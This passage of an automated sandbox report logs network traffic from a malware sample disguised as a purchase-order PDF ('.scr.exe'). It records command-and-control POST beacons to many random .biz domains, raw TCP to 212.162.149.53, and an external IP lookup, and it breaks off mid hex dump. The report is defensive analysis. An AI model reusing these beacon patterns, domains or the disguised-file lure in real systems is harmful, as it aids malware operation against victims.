                            Source: global trafficHTTP traffic detected: POST /eeswgjxjcwha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /ewnwyxek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /butjufvvmucwu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /abotv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /dhvreng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /plbdbgmplm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /cmrwepikmmer HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /pwmmeoh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /dvvbbgutuwtwsq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /cdpttgyexq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /wgxnisegc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /tckhwxqtj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ajbav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /kpiticjpb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /brqvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /mvljr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /bvbcgrbcs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /bgpu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /wrjeoyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                            Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                            Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                            Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                            Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                            Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                            Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                            Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                            Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                            Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                            Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                            Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                            Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                            Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                            Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                            Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                            Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
                            Source: global trafficDNS traffic detected: DNS query: deoci.biz
                            Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
                            Source: global trafficDNS traffic detected: DNS query: qaynky.biz
                            Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
                            Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
                            Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
                            Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
                            Source: global trafficDNS traffic detected: DNS query: myups.biz
                            Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
                            Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
                            Source: global trafficDNS traffic detected: DNS query: jpskm.biz
                            Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
                            Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
                            Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
                            Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
                            Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
                            Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
                            Source: global trafficDNS traffic detected: DNS query: vyome.biz
                            Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
                            Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
                            Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
                            Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
                            Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
                            Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
                            Source: global trafficDNS traffic detected: DNS query: esuzf.biz
                            Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
                            Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
                            Source: global trafficDNS traffic detected: DNS query: brsua.biz
                            Source: global trafficDNS traffic detected: DNS query: dlynankz.biz
                            Source: global trafficDNS traffic detected: DNS query: oflybfv.biz
                            Source: global trafficDNS traffic detected: DNS query: yhqqc.biz
                            Source: global trafficDNS traffic detected: DNS query: mnjmhp.biz
                            Source: global trafficDNS traffic detected: DNS query: opowhhece.biz
                            Source: global trafficDNS traffic detected: DNS query: zjbpaao.biz
                            Source: global trafficDNS traffic detected: DNS query: jdhhbs.biz
                            Source: global trafficDNS traffic detected: DNS query: mgmsclkyu.biz
                            Source: global trafficDNS traffic detected: DNS query: warkcdu.biz
                            Source: global trafficDNS traffic detected: DNS query: gcedd.biz
                            Source: global trafficDNS traffic detected: DNS query: jwkoeoqns.biz
                            Source: global trafficDNS traffic detected: DNS query: xccjj.biz
                            Source: global trafficDNS traffic detected: DNS query: hehckyov.biz
                            Source: global trafficDNS traffic detected: DNS query: rynmcq.biz
                            Source: global trafficDNS traffic detected: DNS query: uaafd.biz
                            Source: global trafficDNS traffic detected: DNS query: eufxebus.biz
                            Source: global trafficDNS traffic detected: DNS query: pwlqfu.biz
                            Source: global trafficDNS traffic detected: DNS query: rrqafepng.biz
                            Source: global trafficDNS traffic detected: DNS query: ctdtgwag.biz
                            Source: global trafficDNS traffic detected: DNS query: tnevuluw.biz
                            Source: global trafficDNS traffic detected: DNS query: whjovd.biz
                            Source: global trafficDNS traffic detected: DNS query: gjogvvpsf.biz
                            Source: global trafficDNS traffic detected: DNS query: reczwga.biz
                            Source: global trafficDNS traffic detected: DNS query: bghjpy.biz
                            Source: global trafficDNS traffic detected: DNS query: damcprvgv.biz
                            Source: global trafficDNS traffic detected: DNS query: ocsvqjg.biz
                            Source: global trafficDNS traffic detected: DNS query: ywffr.biz
                            Source: global trafficDNS traffic detected: DNS query: ecxbwt.biz
                            Source: global trafficDNS traffic detected: DNS query: pectx.biz
                            Source: global trafficDNS traffic detected: DNS query: zyiexezl.biz
                            Source: global trafficDNS traffic detected: DNS query: banwyw.biz
                            Source: global trafficDNS traffic detected: DNS query: muapr.biz
                            Source: global trafficDNS traffic detected: DNS query: wxgzshna.biz
                            Source: unknownHTTP traffic detected: POST /rurmblummdysikl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Oct 2024 08:08:15 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Oct 2024 08:08:15 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Oct 2024 08:08:26 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Oct 2024 08:08:26 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 